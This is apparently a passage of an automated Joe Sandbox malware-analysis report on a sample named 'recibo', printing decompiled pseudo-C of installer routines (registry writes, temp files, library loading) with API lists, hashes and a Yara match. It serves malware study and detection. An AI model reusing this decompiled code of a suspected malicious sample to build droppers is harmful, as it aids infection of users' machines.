                                                                                  							return _t39;
                                                                                  						}
                                                                                  					}
                                                                                  					_t48 =  *_t54;
                                                                                  					if(_t48 == 0) {
                                                                                  						if(_t57 != 1) {
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						E71542E23(_t54);
                                                                                  						L12:
                                                                                  						_t54 = _t48;
                                                                                  						L13:
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_t49 = _t48 - 1;
                                                                                  					if(_t49 == 0) {
                                                                                  						L8:
                                                                                  						_t48 = E71542B98(_t57, _t54); // executed
                                                                                  						goto L12;
                                                                                  					}
                                                                                  					_t50 = _t49 - 1;
                                                                                  					if(_t50 == 0) {
                                                                                  						E71542810(_t54);
                                                                                  						goto L13;
                                                                                  					}
                                                                                  					if(_t50 != 1) {
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					goto L8;
                                                                                  				}
                                                                                  			}



















                                                                                  0x7154187f
                                                                                  0x71541880
                                                                                  0x71541888
                                                                                  0x71541889
                                                                                  0x00000000
                                                                                  0x71541889
                                                                                  0x71541882
                                                                                  0x71541883
                                                                                  0x71541891
                                                                                  0x00000000
                                                                                  0x71541891
                                                                                  0x71541886
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541886

                                                                                  APIs
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E74
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E79
                                                                                    • Part of subcall function 71541BFF: GlobalFree.KERNEL32(?), ref: 71541E7E
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715418C5
                                                                                  • FreeLibrary.KERNEL32(?), ref: 7154194B
                                                                                  • GlobalFree.KERNELBASE(00000000), ref: 71541970
                                                                                    • Part of subcall function 7154243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7154246F
                                                                                    • Part of subcall function 71542810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71541896,00000000), ref: 715428E0
                                                                                    • Part of subcall function 71541666: wsprintfW.USER32 ref: 71541694
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3962662361-3916222277
                                                                                  • Opcode ID: 60f034ea5a3cfc310f27d67c30a8d0326bb4bdbff4298415435a7ebbfaec90c4
                                                                                  • Instruction ID: f6fb769ff49979455742cc5b490b2109d91b991afe5f2e6e9256fab49cb263c5
                                                                                  • Opcode Fuzzy Hash: 60f034ea5a3cfc310f27d67c30a8d0326bb4bdbff4298415435a7ebbfaec90c4
                                                                                  • Instruction Fuzzy Hash: 444109765002069BEB1D9F30E8C8B993BBCBF04354F346466ED5B9E086DB74E084CB60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                                                  				void* _t20;
                                                                                  				void* _t21;
                                                                                  				int _t24;
                                                                                  				long _t25;
                                                                                  				int _t30;
                                                                                  				intOrPtr _t33;
                                                                                  				void* _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				void* _t39;
                                                                                  				void* _t42;
                                                                                  
                                                                                  				_t42 = __eflags;
                                                                                  				_t33 = __edx;
                                                                                  				_t30 = __ebx;
                                                                                  				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                                                  				_t34 = __eax;
                                                                                  				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                  				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                  				_t20 = E00402DA6(0x11);
                                                                                  				 *(_t39 - 4) = 1;
                                                                                  				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                  				 *(_t39 + 8) = _t21;
                                                                                  				if(_t21 != __ebx) {
                                                                                  					_t24 = 0;
                                                                                  					if(_t37 == 1) {
                                                                                  						E00402DA6(0x23);
                                                                                  						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                  					}
                                                                                  					if(_t37 == 4) {
                                                                                  						 *0x40b5f0 = E00402D84(3);
                                                                                  						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                  						_t24 = _t37;
                                                                                  					}
                                                                                  					if(_t37 == 3) {
                                                                                  						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                                                  					}
                                                                                  					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                  					if(_t25 == 0) {
                                                                                  						 *(_t39 - 4) = _t30;
                                                                                  					}
                                                                                  					_push( *(_t39 + 8));
                                                                                  					RegCloseKey(); // executed
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValuelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp
                                                                                  • API String ID: 2655323295-1043476261
                                                                                  • Opcode ID: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                                                                  • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                  • Opcode Fuzzy Hash: 3f2741e17913f4b3ae47e715a678bc9f1b76d5c80f35dbb4c6e867a5b8f0e772
                                                                                  • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v12;
                                                                                  				short _t12;
                                                                                  				intOrPtr _t13;
                                                                                  				signed int _t14;
                                                                                  				WCHAR* _t17;
                                                                                  				signed int _t19;
                                                                                  				signed short _t23;
                                                                                  				WCHAR* _t26;
                                                                                  
                                                                                  				_t26 = _a4;
                                                                                  				_t23 = 0x64;
                                                                                  				while(1) {
                                                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                                                  					_t23 = _t23 - 1;
                                                                                  					_v12 = _t12;
                                                                                  					_t13 =  *0x40a57c; // 0x61
                                                                                  					_v8 = _t13;
                                                                                  					_t14 = GetTickCount();
                                                                                  					_t19 = 0x1a;
                                                                                  					_v8 = _v8 + _t14 % _t19;
                                                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                  					if(_t17 != 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_t23 != 0) {
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						 *_t26 =  *_t26 & _t23;
                                                                                  					}
                                                                                  					L4:
                                                                                  					return _t17;
                                                                                  				}
                                                                                  				_t17 = _t26;
                                                                                  				goto L4;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040607A
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                  • API String ID: 1716503409-944333549
                                                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                  • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                  • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 60%
                                                                                  			E004020D8(void* __ebx, void* __eflags) {
                                                                                  				struct HINSTANCE__* _t23;
                                                                                  				struct HINSTANCE__* _t31;
                                                                                  				void* _t32;
                                                                                  				WCHAR* _t35;
                                                                                  				intOrPtr* _t36;
                                                                                  				void* _t37;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t32 = __ebx;
                                                                                  				asm("sbb eax, 0x434fc0");
                                                                                  				 *(_t39 - 4) = 1;
                                                                                  				if(__eflags < 0) {
                                                                                  					_push(0xffffffe7);
                                                                                  					L15:
                                                                                  					E00401423();
                                                                                  					L16:
                                                                                  					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_t35 = E00402DA6(0xfffffff0);
                                                                                  				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                  				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                  					L3:
                                                                                  					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                  					_t47 = _t23 - _t32;
                                                                                  					 *(_t39 + 8) = _t23;
                                                                                  					if(_t23 == _t32) {
                                                                                  						_push(0xfffffff6);
                                                                                  						goto L15;
                                                                                  					}
                                                                                  					L4:
                                                                                  					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                  					if(_t36 == _t32) {
                                                                                  						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                  					} else {
                                                                                  						 *(_t39 - 4) = _t32;
                                                                                  						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                  							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                  						} else {
                                                                                  							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                  							if( *_t36() != 0) {
                                                                                  								 *(_t39 - 4) = 1;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                                  						FreeLibrary( *(_t39 + 8)); // executed
                                                                                  					}
                                                                                  					goto L16;
                                                                                  				}
                                                                                  				_t31 = GetModuleHandleW(_t35); // executed
                                                                                  				 *(_t39 + 8) = _t31;
                                                                                  				if(_t31 != __ebx) {
                                                                                  					goto L4;
                                                                                  				}
                                                                                  				goto L3;
                                                                                  			}











                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 334405425-0
                                                                                  • Opcode ID: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                                                                  • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                  • Opcode Fuzzy Hash: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                                                                  • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                  				int _t10;
                                                                                  				long _t13;
                                                                                  				int* _t16;
                                                                                  				intOrPtr _t21;
                                                                                  				short* _t22;
                                                                                  				void* _t24;
                                                                                  				void* _t26;
                                                                                  				void* _t29;
                                                                                  
                                                                                  				_t22 = __edi;
                                                                                  				_t21 = __edx;
                                                                                  				_t16 = __ebx;
                                                                                  				_t24 = E00402DE6(_t29, 0x20019);
                                                                                  				_t10 = E00402D84(3);
                                                                                  				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                  				 *__edi = __ebx;
                                                                                  				if(_t24 == __ebx) {
                                                                                  					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                  				} else {
                                                                                  					 *(_t26 + 8) = 0x3ff;
                                                                                  					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                  						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                  						__eflags = _t13;
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                  					}
                                                                                  					_t22[0x3ff] = _t16;
                                                                                  					_push(_t24); // executed
                                                                                  					RegCloseKey(); // executed
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                                  				return 0;
                                                                                  			}












                                                                                  APIs
                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Enum$CloseValue
                                                                                  • String ID:
                                                                                  • API String ID: 397863658-0
                                                                                  • Opcode ID: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
                                                                                  • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                  • Opcode Fuzzy Hash: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
                                                                                  • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?,C9BF8E65,?,02CB291E), ref: 02CC361E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: vq
                                                                                  • API String ID: 1029625771-385929040
                                                                                  • Opcode ID: 6b5cd3f67ff7ab3f71bba099d0037acf9ec97ec04af4a08e0bc47406c3d615e7
                                                                                  • Instruction ID: 19caf94afc1b37fde6280baa76b20f7a5ac25811349976999914a868d0fb9dd8
                                                                                  • Opcode Fuzzy Hash: 6b5cd3f67ff7ab3f71bba099d0037acf9ec97ec04af4a08e0bc47406c3d615e7
                                                                                  • Instruction Fuzzy Hash: 5751CB75A00345CFCB259E38CD653DA3BA2AF56390FA4805EDC89CB304E7728A459B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E004015C1(short __ebx, void* __eflags) {
                                                                                  				void* _t17;
                                                                                  				int _t23;
                                                                                  				void* _t25;
                                                                                  				signed char _t26;
                                                                                  				short _t28;
                                                                                  				short _t31;
                                                                                  				short* _t34;
                                                                                  				void* _t36;
                                                                                  
                                                                                  				_t28 = __ebx;
                                                                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                  				_t17 = E00405EB7(_t16);
                                                                                  				_t32 = _t17;
                                                                                  				if(_t17 != __ebx) {
                                                                                  					do {
                                                                                  						_t34 = E00405E39(_t32, 0x5c);
                                                                                  						_t31 =  *_t34;
                                                                                  						 *_t34 = _t28;
                                                                                  						if(_t31 != _t28) {
                                                                                  							L5:
                                                                                  							_t25 = E00405AEB( *(_t36 + 8));
                                                                                  						} else {
                                                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                                  								goto L5;
                                                                                  							} else {
                                                                                  								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                                  							}
                                                                                  						}
                                                                                  						if(_t25 != _t28) {
                                                                                  							if(_t25 != 0xb7) {
                                                                                  								L9:
                                                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                  							} else {
                                                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                  								if((_t26 & 0x00000010) == 0) {
                                                                                  									goto L9;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						 *_t34 = _t31;
                                                                                  						_t32 = _t34 + 2;
                                                                                  					} while (_t31 != _t28);
                                                                                  				}
                                                                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                  					_push(0xfffffff5);
                                                                                  					E00401423();
                                                                                  				} else {
                                                                                  					E00401423(0xffffffe6);
                                                                                  					E0040653D(0x441000,  *(_t36 + 8));
                                                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                  					if(_t23 == 0) {
                                                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                  					}
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                                  				return 0;
                                                                                  			}












                                                                                  APIs
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 44w,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,77343420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                    • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                  • String ID:
                                                                                  • API String ID: 1892508949-0
                                                                                  • Opcode ID: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                                                                  • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                  • Opcode Fuzzy Hash: e89a9e6a3f09ade376d0d4b3fd71c203f5cd3ef8be9bd613e1140dffb9deb40c
                                                                                  • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 84%
                                                                                  			E0040252A(int* __ebx, char* __edi) {
                                                                                  				void* _t17;
                                                                                  				short* _t18;
                                                                                  				void* _t35;
                                                                                  				void* _t37;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				_t33 = __edi;
                                                                                  				_t27 = __ebx;
                                                                                  				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                  				_t35 = _t17;
                                                                                  				_t18 = E00402DA6(0x33);
                                                                                  				 *__edi = __ebx;
                                                                                  				if(_t35 == __ebx) {
                                                                                  					 *(_t37 - 4) = 1;
                                                                                  				} else {
                                                                                  					 *(_t37 - 0x10) = 0x800;
                                                                                  					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                  						L7:
                                                                                  						 *_t33 = _t27;
                                                                                  						 *(_t37 - 4) = 1;
                                                                                  					} else {
                                                                                  						if( *(_t37 + 8) == 4) {
                                                                                  							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                  							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                  							E00406484(__edi,  *__edi);
                                                                                  						} else {
                                                                                  							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                  								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                  								_t33[0x7fe] = _t27;
                                                                                  							} else {
                                                                                  								goto L7;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t35); // executed
                                                                                  					RegCloseKey(); // executed
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                                  				return 0;
                                                                                  			}









                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsf321E.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
